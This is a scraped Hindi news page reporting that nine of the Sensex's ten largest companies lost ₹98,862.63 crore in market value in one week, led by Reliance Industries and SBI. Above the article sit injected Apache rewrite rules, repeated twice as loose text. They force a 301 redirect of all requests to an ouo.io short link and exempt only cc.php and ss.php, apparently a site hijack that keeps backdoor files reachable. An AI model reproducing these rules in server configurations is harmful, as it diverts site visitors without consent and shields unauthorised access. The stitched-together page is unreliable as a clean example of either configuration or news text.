
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 434
सेंसेक्स की शीर्ष 10 में से नौ कंपनियों का बाजार पूंजीकरण (मार्केट कैप) पिछले सप्ताह 98,862.63 करोड़ रुपये घट गया। रिलायंस इंडस्ट्रीज एवं भारतीय स्टेट बैंक (एसबीआई) के बाजार पूंजीकरण में सर्वाधिक कमी दर्ज की गई। बीते सप्ताह केवल आईटीसी के बाजार पूंजीकरण में बढ़ोतरी दर्ज की गई। कंपनियों के बाजार पूंजीकरण के साप्ताहिक विश्लेषण के अनुसार टाटा कंसल्टेंसी सर्विसेज (टीसीएस), एचडीएफसी बैंक, हिंदुस्तान यूनिलीवर, इन्फोसिस, एचडीएफसी, कोटक महिंद्रा बैंक, भारतीय स्टेट बैंक और आईसीआईसीआई बैंक का बाजार पूंजीकरण घट गया।
आलोच्य सप्ताह में आरआईएल का बाजार पूंजीकरण 21,456.38 करोड़ रुपए की गिरावट के साथ 7,88,213.12 करोड़ रुपए रहा। वहीं एसबीआई का बाजार पूंजीकरण 19,723.34 करोड़ रुपये की गिरावट के साथ 2,34,672.03 करोड़ रुपये रहा। टीसीएस का बाजार मूल्यांकन 11,951.35 करोड़ रुपये घटकर 7,62,071.81 करोड़ रुपए रहा। एचडीएफसी की बाजार हैसियत 11,725.23 करोड़ रुपये घटकर 3,22,531.39 करोड़ रुपये रही।
हिन्दुस्तान यूनिलीवर लिमिटेड का बाजार पूंजीकरण 9,600.22 करोड़ रुपये की कमी के साथ 3,83,803.08 करोड़ रुपए रहा। शुक्रवार को समाप्त सप्ताह में आईसीआईसीआई बैंक का बाजार पूंजीकरण 8,293.27 करोड़ रुपये की गिरावट के साथ 2,20,351.47 करोड़ रुपए रहा। इन्फोसिस का बाजार पूंजीकरण 7,906.92 करोड़ रुपए घटकर 3,24,044.79 करोड़ रुपए रहा।
समीक्षाधीन सप्ताह में एचडीएफसी बैंक का बाजार पूंजीकरण 5,998.66 करोड़ रुपए की कमी के साथ 5,71,599.92 करोड़ रुपए रहा। कोटक महिद्रा बैंक का बाजार पूंजीकरण 2,207.26 करोड़ रुपये की कमी के साथ 2,44,943.86 करोड़ रुपए रहा। इसके विपरीत आईटीसी का बाजार पूंजीकरण 4,593.55 करोड़ रुपये की बढ़ोतरी के साथ 3,42,495.09 करोड़ रुपए रहा।
शीर्ष दस कंपनियों की सूची में आरआईएल पहले स्थान पर रही। इसके बाद टीसीएस, एचडीएफसी बैंक, एचयूएल, आईटीसी, इन्फोसिस, एचडीएफसी, कोटक महिद्रा बैंक, एसबीआई और आईसीआईसीआई बैंक का स्थान आता है। पिछले सप्ताह सेंसेक्स 737.53 अंक यानी दो प्रतिशत की गिरावट के साथ शुक्रवार को 35,808.95 अंक पर बंद हुआ।